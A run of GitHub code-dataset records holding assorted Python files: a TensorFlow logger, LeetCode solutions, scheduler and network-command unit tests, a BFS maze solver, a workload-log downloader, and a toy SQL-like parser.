9])\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=4)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=16)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=32)\r\n # generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=64)\r\n generate_rotated_MNIST(\"MNIST data/\", digits=[3], latent_dim_object_vector=24)\r\n\r\n","repo_name":"metodj/FGP-VAE","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20978,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"13723476356","text":"import tensorflow as tf\nimport numpy as np\nimport io\nimport PIL.Image\n\n\nclass Logger(object):\n def __init__(self, log_dir):\n self.writer = tf.summary.create_file_writer(log_dir)\n\n def scalar_summary(self, tag, value, step):\n with self.writer.as_default():\n tf.summary.scalar(tag, value, step=step)\n\n def image_summary(self, tag, images, step):\n with self.writer.as_default():\n image_summaries = []\n for i, img in enumerate(images):\n # Convert image to PIL Image object\n pil_img = PIL.Image.fromarray(img)\n\n # Create a BytesIO object to store the image data\n image_buffer = io.BytesIO()\n pil_img.save(image_buffer, format='PNG')\n\n # Create an Image Tensor\n img_tensor = tf.image.decode_image(image_buffer.getvalue(), channels=4)\n\n # Add image summary\n image_summaries.append(tf.summary.image(f'{tag}/{i}', [img_tensor], step=step))\n\n tf.summary.experimental.write_raw_pb(tf.summary.experimental.serialize_many_summary(image_summaries), step=step)\n\n def histo_summary(self, tag, values, step, bins=1000):\n with self.writer.as_default():\n tf.summary.histogram(tag, values, step=step, buckets=bins)","repo_name":"AbhishekKaushikCV/SEGMENT3D","sub_path":"train/common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21308396624","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n if len(nums) <= 3:\n return max(nums)\n \n def houseRobbed(index, bound):\n if index > bound:\n return 0\n \n if index in memo:\n return memo[index]\n \n memo[(index)] = max(nums[index] + houseRobbed(index + 2, bound), houseRobbed( index + 1, bound))\n return memo[(index)]\n \n memo = {}\n FirstHouseRobbed = houseRobbed(0, len(nums) - 2)\n \n memo.clear()\n LastHouseRobbed = houseRobbed(1, len(nums) - 1)\n \n return max(FirstHouseRobbed, LastHouseRobbed)\n ","repo_name":"YeabAM/A2SV","sub_path":"0213-house-robber-ii/0213-house-robber-ii.py","file_name":"0213-house-robber-ii.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"29093498821","text":"\"\"\"Unit tests for sched_funcs.py decorators\"\"\"\n\nimport os\nimport sys\nimport time\nimport datetime\nimport logging\nimport functools\nimport unittest\n\nimport mock\nimport pytest\nimport schedule\nfrom schedule import every\n\nfrom node_tools.helper_funcs import NODE_SETTINGS\nfrom node_tools.helper_funcs import AttrDict\nfrom node_tools.helper_funcs import send_announce_msg\nfrom node_tools.network_funcs import echo_client\nfrom node_tools.network_funcs import get_net_cmds\nfrom node_tools.network_funcs import run_net_cmd\nfrom node_tools.network_funcs import send_wedged_msg\nfrom node_tools.sched_funcs import catch_exceptions\nfrom node_tools.sched_funcs import run_until_success\nfrom node_tools.sched_funcs import show_job_tags\n\ntry:\n from datetime import timezone\n utc = timezone.utc\nexcept ImportError:\n from schedule.timezone import UTC\n utc = UTC()\n\n\ndef make_mock_job(name=None):\n job = mock.Mock()\n job.__name__ = name or 'job'\n return job\n\n\nclass mock_datetime(object):\n \"\"\"\n Monkey-patch datetime for predictable results\n \"\"\"\n def __init__(self, year, month, day, hour, minute, second=0):\n self.year = year\n self.month = month\n self.day = day\n self.hour = hour\n self.minute = minute\n self.second = second\n\n def __enter__(self):\n class MockDate(datetime.datetime):\n @classmethod\n def today(cls):\n return cls(self.year, self.month, self.day)\n\n @classmethod\n def now(cls, tz=None):\n return cls(self.year, self.month, self.day,\n self.hour, self.minute, self.second).replace(tzinfo=tz)\n\n self.original_datetime = datetime.datetime\n datetime.datetime = MockDate\n\n def __exit__(self, *args, **kwargs):\n datetime.datetime = self.original_datetime\n\n\nclass ScheduleTests(unittest.TestCase):\n def setUp(self):\n self.bin_dir = os.path.join(os.getcwd(), 'test/fpnd/')\n schedule.clear()\n\n def test_job_info(self):\n with mock_datetime(2010, 1, 6, 14, 16):\n mock_job = make_mock_job(name='info_job')\n info_job = every().minute.do(mock_job, 1, 7, 'three')\n schedule.run_all()\n assert len(schedule.jobs) == 1\n assert schedule.jobs[0] == info_job\n assert repr(info_job)\n assert info_job.job_name is not None\n s = info_job.info\n assert 'info_job' in s\n assert 'three' in s\n assert '2010' in s\n assert '14:16' in s\n\n def test_cancel_job(self):\n @show_job_tags()\n def stop_job():\n return schedule.CancelJob\n mock_job = make_mock_job()\n\n every().second.do(stop_job)\n mj = every().second.do(mock_job)\n assert len(schedule.jobs) == 2\n\n schedule.run_all()\n assert len(schedule.jobs) == 1\n assert schedule.jobs[0] == mj\n\n schedule.cancel_job('Not a job')\n assert len(schedule.jobs) == 1\n schedule.default_scheduler.cancel_job('Not a job')\n assert len(schedule.jobs) == 1\n\n schedule.cancel_job(mj)\n assert len(schedule.jobs) == 0\n\n def test_run_net_cmd_sup(self):\n cmd_up0 = get_net_cmds(self.bin_dir, 'fpn0', True)\n cmd_up1 = get_net_cmds(self.bin_dir, 'fpn1', True)\n\n every().second.do(run_net_cmd, cmd_up0).tag('net-change')\n every().second.do(run_net_cmd, cmd_up1).tag('net-change')\n\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 0)\n\n def test_run_net_cmd_sdown(self):\n NODE_SETTINGS['route_dns_53'] = True\n NODE_SETTINGS['private_dns_only'] = True\n\n cmd_down0 = get_net_cmds(self.bin_dir, 'fpn0', False)\n cmd_down1 = get_net_cmds(self.bin_dir, 'fpn1', False)\n\n every().second.do(run_net_cmd, cmd_down0).tag('net-change')\n every().second.do(run_net_cmd, cmd_down1).tag('net-change')\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 0)\n\n\nclass SendMsgTest(unittest.TestCase):\n \"\"\"\n Note the input for this test case is just nodeState.fpn_id and\n mainly tests the warning generated by the nanomsg timeout.\n \"\"\"\n def setUp(self):\n super(SendMsgTest, self).setUp()\n from node_tools import state_data as st\n\n schedule.clear()\n self.default_state = st.defState\n self.state = st.fpnState\n self.cfg = st.cfg_msgs\n self.addr = '127.0.0.1'\n\n def tearDown(self):\n from node_tools import state_data as st\n\n # defState = s.defState\n\n st.fpnState = self.default_state\n super(SendMsgTest, self).tearDown()\n\n def test_send_echo_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n # expected command result is a list so the return\n # result for echo_client() is actually None\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_announce_msg(fpn_id, None)\n schedule.run_all()\n\n with self.assertWarns(RuntimeWarning) as err:\n result = echo_client(fpn_id, self.addr)\n # print(result)\n self.assertIs(result, None)\n\n def test_send_cfg_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n # expected command result is a list so the return\n # result for echo_client() is actually None\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_announce_msg(fpn_id, None, send_cfg=True)\n schedule.run_all()\n\n with self.assertWarns(RuntimeWarning) as err:\n result = echo_client(fpn_id, self.addr, send_cfg=True)\n # print(result)\n self.assertIs(result, None)\n\n def test_send_wedged_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_wedged_msg()\n schedule.run_all()\n\n # expected command result is a list\n result = send_wedged_msg(self.addr)\n # print(result)\n self.assertEqual([], result)\n\n\nclass NetCmdTests(unittest.TestCase):\n \"\"\"\n Slightly better tests (than NetCmdTest) using schedule.\n \"\"\"\n def setUp(self):\n self.bin_dir = os.path.join(os.getcwd(), 'test/fpnd/')\n schedule.clear()\n\n def test_run_net_cmd_false(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n cmd = ['/bin/false']\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertEqual(res, b'')\n\n def test_get_net_cmds_bad_path(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n bad_dir = '/tmp/foobar/'\n cmd = ['/tmp/foo0-down.sh']\n self.assertFalse(os.path.isdir(bad_dir))\n res = get_net_cmds(bad_dir, 'fpn0', True)\n # print(cmd)\n self.assertIsNone(res)\n state, result, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertRaises(FileNotFoundError)\n # print(result)\n\n def test_run_net_cmd_not_found(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n cmd = ['/bin/tuna']\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertRaises(FileNotFoundError)\n\n def test_run_net_cmd_up0(self):\n # expected command result is 'Success' so the return\n # result is actually \n mock_job = make_mock_job()\n cmd = get_net_cmds(self.bin_dir, 'fpn0', True)\n tj = every().second.do(mock_job)\n\n result = run_net_cmd(cmd)\n self.assertIsInstance(result, type)\n self.assertIn('CancelJob', str(result))\n\n def test_run_net_cmd_down0(self):\n # expected command result is 'Fail' so the return\n # result is the output of run_net_cmd()\n mock_job = make_mock_job()\n cmd = get_net_cmds(self.bin_dir, 'fpn0', False)\n tj = every().second.do(mock_job)\n\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertEqual(res, b'')\n self.assertEqual(ret, 1)\n","repo_name":"freepn/fpnd","sub_path":"test/test_sched_decorators.py","file_name":"test_sched_decorators.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":293,"dataset":"github-code","pt":"16"}
+{"seq_id":"28330020234","text":"adj = []\ns = ['+++++++++++++++++++++++',\n 'S + + +',\n '+ +++ + ++++ + ++++++ +',\n '+ + + + + + +',\n '+ ++++++++ +++ + + ++++',\n '+ + + + + + ++',\n '++++ + +++ + +++++ + +',\n '+ + + + +',\n '+ ++++++ + ++++++ +++++',\n '+ + + +',\n '+++++++++++++++++++++F+']\n\nfor t in s:\n adj.append(list(t))\n\nprint(adj)\ncol = len(adj[0])\nrow = len(adj)\nprint('Row = %d' % row)\nprint('Column = %d' % col)\n\nqueue = []\n\n\ndef stringify(i, j):\n s = ''\n s = s + str(i) + '-' + str(j)\n return s\n\n\ndef maze():\n i = 0\n while i < len(adj):\n for j in range(len(adj[i])):\n print(adj[i][j], end=\" \")\n print()\n i += 1\n\n\ndef maze_solver(i, j):\n maze()\n print()\n print()\n # print('Remaining Path Options => %s' % queue)\n adj[i][j] = '.'\n count = 0\n record = []\n if adj[i + 1][j] == ' ':\n count += 1\n record.append(stringify(i + 1, j))\n\n if adj[i - 1][j] == ' ':\n count += 1\n record.append(stringify(i - 1, j))\n\n if adj[i][j + 1] == ' ':\n count += 1\n record.append(stringify(i, j + 1))\n\n if adj[i][j - 1] == ' ':\n count += 1\n record.append(stringify(i, j - 1))\n\n if adj[i + 1][j] == 'F':\n adj[i + 1][j] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i + 1, j))\n quit()\n\n if adj[i - 1][j] == 'F':\n adj[i - 1][j] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i - 1, j))\n quit()\n\n if adj[i][j + 1] == 'F':\n adj[i][j + 1] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i, j + 1))\n quit()\n\n if adj[i][j - 1] == 'F':\n adj[i][j - 1] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i, j - 1))\n quit()\n\n if count == 1:\n l = record[0].split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n if count > 1:\n queue.extend(record)\n l = queue.pop(0).split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n else:\n l = queue.pop(0).split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n\nprint('Initial Stage')\np = 0\nwhile p < len(adj):\n for q in range(len(adj[p])):\n if adj[p][q] == 'S':\n print('Fun Begins at (%d, %d)' % (p, q))\n maze_solver(p, q)\n else:\n pass\n\n p += 1\n","repo_name":"simon619/Maze-Solving-Using-Breadth-First-Search","sub_path":"SimonsMaze.py","file_name":"SimonsMaze.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70414991687","text":"import urllib.request\nimport os\nimport pathlib\nimport gzip\n\nimport setup as s\n\n# ##################################################################\n# pwaFileImport\n# ##################################################################\ndef pwaFileImport(webRetrieve=False, unzipfiles=True, maxFiles = 5):\n \"\"\"\n Import files froms website https://www.cs.huji.ac.il\n Logs (of real life) of set of job times.\n Retrieve file catalog : address setted in constant s.URL_CATALOG_PWA\n reads this file which contains the url addresses of the time files\n and each file is retreived in the folder FOLDER_ZIPPEDLOG,\n to be unzipped in the folder FOLDER_PWA\n input\n :param webRetrieve: True : retreive files from website.\n :param unzipfiles : True : unzip files from zippedLog folder to PWA folder\n :param maxFiles : number of files to retreive from website.\n use 0 to retreive all files\n \"\"\"\n tabFiles = []\n\n #-------------------------------\n # log directory\n # s.folder creates requested directories if not exists\n # curDir = os.path.abspath(os.curdir)\n #-------------------------------\n zipDir = s.folder(s.FOLDER_ZIPPEDLOG)\n logDir = s.folder(s.FOLDER_PWA)\n \n #-------------------------------\n # Web resource web --> zipDir\n #-------------------------------\n if webRetrieve:\n # read distant file\n fichierNom = s.URL_CATALOG_PWA # url of files log catalog \n req = urllib.request.Request(url=fichierNom) \n fichierId = urllib.request.urlopen(req)\n\n # put the list on a list tabFiles\n contentsLine = fichierId.readline().decode('utf-8')\n while contentsLine:\n tabFiles.append(contentsLine.rstrip(\"\\n\")) # erase \\n caracter from the string \n contentsLine = fichierId.readline().decode('utf-8')\n\n # close the file\n fichierId.close()\n \n # now i have my list of pwa gz logs\n n=0\n for file in tabFiles:\n n+=1\n if (n > maxFiles or maxFiles==0):\n break\n fileInfo = pathlib.Path(file)\n # destFile = os.path.join(zipDir, fileInfo.name)\n destFile = zipDir+\"/\"+fileInfo.name\n urllib.request.urlretrieve(file, destFile)\n print(\"file ========> \"+destFile+\" retrieved.\")\n\n if unzipfiles == True:\n unzipGZ(fileInfo.name, zipDir, logDir)\n# ##################################################################\n# unzipGZ\n# ##################################################################\ndef unzipGZ(fileNameGZ, fromDir, destDir):\n \"\"\"\n Unzip the file named fromDir+fileNameGZ\n in the folder destDir. \n \"\"\"\n #\n fromFile = fromDir+s.sepDir()+fileNameGZ\n destFile = destDir+s.sepDir()+fileNameGZ.rstrip(\".gz\")\n #\n print(\"Unzipping file %s in %s\" % (fromFile, destDir))\n #\n src = gzip.GzipFile(fromFile, 'rb')\n sRead = src.read()\n src.close()\n d = open(destFile, 'wb')\n d.write(sRead)\n d.close()\n print(\"Unzipped.\")\n\n# ##################################################################\n# pwaFileRead\n# ##################################################################\ndef pwaFileRead(fileName):\n \"\"\"\n Reads the log file according to the predefined format,\n to create an instance (set of times)\n called from matrix.py\n \"\"\"\n with open(fileName, 'r') as f:\n text = f.read()\n # END WITH \n times = []\n for line in text.split('\\n'):\n line = line.strip()\n if not(line) or line[0] == \";\":\n continue\n # END IF\n jobId, submitTime, waitTime, runTime, nbProc, avgCPUtime, mem, reqProc, reqTime, reqMem, status, uId, gId, appId, queueId, partitionId, precedingJob, timefromPrecedingJob = [float(x) for x in line.split()]\n if runTime != 0:\n # times += [runTime]\n times.append(runTime)\n # END IF\n # END FOR\n return times\n# ##################################################################\n# pwaFileChoice():\n# ##################################################################\ndef pwaFileChoice(chooseMode = None):\n \"\"\"\n finds the files contained in the \"FOLDER_PWA\" directory,\n and proposes to choose them, or not (for test instance creation).\n :Param chooseMode : None Asc for use the current files / 1 Always answer YES, 0 Always answer NO, \n Returns the list of selected files as a list files[]\n \"\"\"\n files = []\n logDir = s.folder(s.FOLDER_PWA)\n content = os.listdir(logDir)\n for item in content:\n if chooseMode == None:\n r = int(input(\"Use this file %s ? (1 yes 0 no) : \" % (item)))\n else:\n r=chooseMode\n # END IF \n if r == 1:\n files.append(logDir+s.sepDir()+item)\n # END IF\n # END FOR\n print(files)\n return files\n\n##TO TEST THIS SCRIPT\n##pwaFileImport(True, True)\n##logTimes = pwaFileRead(logFolder()+\"/NASA-iPSC-1993-3.1-cln.swf\")\n##print(logTimes)\n##pwaFileChoice()\n\n\n","repo_name":"fColas68/appCmax","sub_path":"pwa.py","file_name":"pwa.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"15511874337","text":"# 常规写法 获取字符串中的数字\ns = 'shidi33d6662bb99fff6d5'\nfor i in s:\n # 判断当前字符是不是一个数字 TF\n if i.isnumeric():\n print(i)\n\n# 正则匹配\nimport re # 内置 不需要下载\n# findall(匹配规则,匹配内容) 返回形式是列表\nres = re.findall('\\d+',s)\nprint(res)\n\n\n","repo_name":"xiaoguiy/python-scrapy","sub_path":"10-正则(上)/上课代码/04-正则概述.py","file_name":"04-正则概述.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7402966182","text":"n=int(input())\r\np_list=[]\r\n\r\nfor i in range(n):\r\n w,h=map(int,input().split())\r\n p_list.append([w,h])\r\n \r\nfor i in p_list:\r\n grade=1\r\n for j in p_list:\r\n if i[0] < j[0] and i[1] < j[1]:\r\n grade+=1\r\n print(grade)","repo_name":"parkminji03/Study_kt","sub_path":"11.브루트포스/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25758875291","text":"# Importing libraries\nimport re\nimport storage as db\nimport sys\n\nstorage = db.storager()\n\n# Parser process:\n# Parsing words -- DONE!\n# Exit function -- DONE!\n# Create function -- DONE!\n# Insert function -- DONE!\n# Select function -- edit select in storager with order\n# Delete finction -- edit select in storager with condition\n\n# Function to parse words into commands and find command type if it is possible\ndef parse(self, words):\n command = re.findall(r'\\S+', words)\n print(command)\n command_type = command[0]\n command_type = command_type.upper()\n symbols = ['(', ')', ',', '.', ';']\n\n # Find command type and arguments or print command error\n if command_type not in Parser.COMMANDS:\n print(f\"Command '{command_type}' not found!\")\n command_exec = 0\n\n elif command_type == 'EXIT': \n print('Stopping program...')\n Parser.exit_command = True\n sys.exit() \n\n elif command_type == 'CREATE':\n table_name = command[1]\n if re.match(Parser.NAMES, table_name) and table_name.upper() not in Parser.COMMANDS and table_name.upper() not in Parser.SPECIAL_WORDS:\n columns = []\n i = 2\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n # Searching indexing columns and mark them to indexed_flag = True\n while i < len(command):\n if i + 1 < len(command):\n indexed_word = command[i + 1]\n if indexed_word.upper() == 'INDEXED':\n indexed_flag = True\n else:\n indexed_flag = False\n columns.append([command[i], indexed_flag])\n i += int(indexed_flag)\n else:\n indexed_flag = False\n columns.append([command[i], indexed_flag])\n i += 1\n print(columns)\n command_exec = storage.create_db(table_name, columns)\n else:\n print('Invalid table name!')\n\n elif command_type == 'INSERT':\n values = []\n i = 2\n # Detecting table_name\n if command[1].upper() not in Parser.COMMANDS and command[1].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[1]\n elif command[2].upper() not in Parser.COMMANDS and command[2].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[2]\n i += 1\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n while i < len(command):\n values.append(command[i])\n i += 1\n print(values)\n command_exec = storage.insert_db(table_name, values)\n\n elif command_type == 'SELECT':\n columns = []\n condition = []\n order = []\n i = 1\n # Detecting selection columns\n from_pos = 0\n where_pos = 0\n order_pos = 0\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n while i < len(command):\n if command[i].upper() == 'FROM':\n from_pos = i\n if command[i].upper() == 'WHERE':\n where_pos = i\n if command[i].upper() == 'ORDER_BY':\n order_pos = i\n i += 1\n\n for i in range(1, from_pos):\n columns.append(command[i])\n table_name = command[from_pos + 1]\n if where_pos != 0 and order_pos != 0:\n for i in range(where_pos + 1, order_pos):\n condition.append(command[i])\n elif where_pos != 0 and order_pos == 0:\n for i in range(where_pos + 1, len(command)):\n condition.append(command[i])\n if order_pos != 0:\n for i in range(order_pos + 1, len(command)):\n order.append(command[i])\n print(f\"t_n {table_name}\")\n print(f\"columns {columns}\")\n print(f\"condition {condition}\")\n print(f\"order {order}\")\n command_exec = storage.select_db(table_name, columns, condition, order)\n\n elif command_type == 'DELETE':\n condition = []\n where_pos = 0\n i = 2\n\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n \n # Detecting table_name\n if command[1].upper() not in Parser.COMMANDS and command[1].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[1]\n elif command[2].upper() not in Parser.COMMANDS and command[2].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[2]\n i += 1\n print(f\"table_name -- {table_name}\")\n print(f\"len(command) -- {len(command)}\")\n print(f\"i -- {i}\")\n while i < len(command):\n if command[i].upper() == 'WHERE':\n where_pos = i\n i += 1\n if where_pos != 0:\n for i in range(where_pos + 1, len(command)):\n condition.append(command[i])\n print(f\"condition -- {condition}\")\n command_exec = storage.delete_db(table_name, condition)\n \n return command_exec\n\n\n# Parser class\nclass Parser:\n NAMES = r\"[a-zA-Z][a-zA-Z0-9_]*\"\n COMMANDS = {'CREATE', 'INSERT', 'SELECT', 'DELETE', 'EXIT'}\n SPECIAL_WORDS = {'INDEXED', 'INTO', 'FROM', 'WHERE', 'ORDER_BY'}\n\n def __init__(self):\n input_command = ''\n input_accept = True\n exit_command = False\n print('Use \"EXIT\" command to stop this program')\n\n # Command input\n while not exit_command:\n while input_accept:\n input_command += ' ' + input('>>').strip()\n if ';' in input_command:\n for words in input_command.split(';'):\n if words:\n #print(words)\n parse(self, words)\n input_accept = False\n input_accept = True\n\n #command = re.findall(r'\\S+', words)\n #print(command)\n\nif __name__ == '__main__':\n parser = Parser()\n","repo_name":"AntoshaGodx/aaf-labs-2021","sub_path":"shevchenko_fi-92_kozlovska_fi-92/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37415723791","text":"\"\"\"2427. Number of Common Factors\"\"\"\n\n\nclass Solution:\n def commonFactors(self, a: int, b: int) -> int:\n count = 1\n i = 2\n\n while i <= min(a, b):\n if a % i == 0 and b % i == 0:\n count += 1\n i += 1\n\n return count\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"easy/2427.py","file_name":"2427.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2216404079","text":"from torch.utils.data import Dataset\nimport numpy as np\n\n\nclass DrumDataset(Dataset):\n def __init__(self, data_list):\n self.data_list = data_list\n\n def __len__(self):\n return len(self.data_list)\n\n def __getitem__(self, idx):\n curr_data = self.data_list[idx]\n skel = curr_data['skeleton']\n note = curr_data['note']\n vel = curr_data['vel']\n mt = curr_data['mt']\n tempo = curr_data['tempo']\n fname = curr_data['midi_f']\n genre = curr_data['genre']\n note_density_idx = curr_data['note_density_idx']\n vel_contour = curr_data['vel_contour']\n time_contour = curr_data[\"time_contour\"]\n # time_contour =\n\n # skel = skel[ np.newaxis, :]\n # note = note[np.newaxis, :]\n # vel = vel* 127 // 4\n\n # range1 = 2\n # range2 = 100\n\n # mt = (range2 * (mt + (range1 /2))) / range1 - (range2/2) + 50\n\n # vel = vel / 32\n # mt = mt / 100\n\n n_inst = np.sum(note, 0)\n n_inst[n_inst > 1] = 1\n\n n_inst = int(np.sum(n_inst)) - 1\n\n return {\n \"skel\": skel,\n \"note\": note,\n \"vel\": vel,\n \"mt\": mt,\n \"tempo\": tempo,\n \"fname\": fname,\n \"genre\": genre,\n \"note_density_idx\": note_density_idx,\n \"vel_contour\": vel_contour,\n # \"vel_accent\": vel_accent,\n \"time_contour\": time_contour,\n \"n_inst\": n_inst\n # \"time_mode\": time_mode\n # \"deco\": deco\n }\n","repo_name":"kyungyunlee/PocketVAE","sub_path":"src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"34552216105","text":"def def_casos(T):\r\n casos_valor = []\r\n casos_keys = []\r\n for i in range(T):\r\n value = int(input(f\"Ingrese #Caso {i+1}: \"))\r\n while(value>200 or value<0):\r\n value = int(input(\"Porfavor, ingrese un #Caso entre 0 y 200: \")) \r\n if(value>=0 and value<=200):\r\n casos_valor.append(value)\r\n casos_keys.append(f\"Caso #{i+1}\")\r\n\r\n return casos_keys, casos_valor\r\n\r\ndef ciclo_bleatrix(N, casos_keys):\r\n \"\"\"\r\n x = []\r\n for i in range(0,10):\r\n x.append(i)\r\n \"\"\"\r\n validador = [0,1,2,3,4,5,6,7,8,9]\r\n valores_keys = []\r\n print(N)\r\n\r\n for valor in N:\r\n i=0\r\n compara = []\r\n while((compara!=validador)):\r\n i+=1\r\n x = valor * i\r\n for digits in str(x):\r\n compara.append(int(digits))\r\n compara = list(dict.fromkeys(compara))\r\n compara.sort()\r\n if(compara == validador):\r\n valores_keys.append(x)\r\n break\r\n elif((valor==0)):\r\n valores_keys.append(\"INSOMNIA\")\r\n break\r\n\r\n return dict(zip(casos_keys, valores_keys))\r\n \r\n\r\nif __name__ == \"__main__\":\r\n T = int(input(\"Introducir cantidad de casos a probar: \"))\r\n while(T is None or T>100 or T<1):\r\n T = int(input(\"Porfavor, ingrese un valor entre 1 y 100: \"))\r\n\r\n T_par = def_casos(T)\r\n print(ciclo_bleatrix(T_par[1], T_par[0]))\r\n ","repo_name":"FrancoTruffa/technicaltest","sub_path":"exercise_3.py","file_name":"exercise_3.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36707527496","text":"class Solution:\n def add(self, a: int, b: int) -> int:\n \"\"\"\n 不用加法运算做加法\n :param a:\n :param b:\n :return:\n 复杂度分析:时间复杂度O()\n \"\"\"\n x = 0xffffffff\n a = a & x\n b = b & x\n while b != 0:\n # a = a ^ b\n # b = (a & b) << 1 & x\n # 上面和下面的写法不同,计算结果也不相同,并排写法能同时运算结果,互不影响,分别计算非进位和和进位和\n a, b = (a ^ b), (a & b) << 1 & x\n print(\"a:{}\".format(a))\n print(\"b:{}\".format(b))\n return a if a <= 0x7fffffff else ~(a ^ x) # 若补码 a 为负数( 0x7fffffff 是最大的正数的补码 ),需执行 ~(a ^ x) 操作,将补码还原至 Python 的存储格式,~(a ^ x) 是将 32 位以上的位取反,1 至 32 位不变。\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.add(a=1, b=2))","repo_name":"Cecilia520/algorithmic-learning-leetcode","sub_path":"cecilia-python/剑指offer/chapter-7/Add.py","file_name":"Add.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
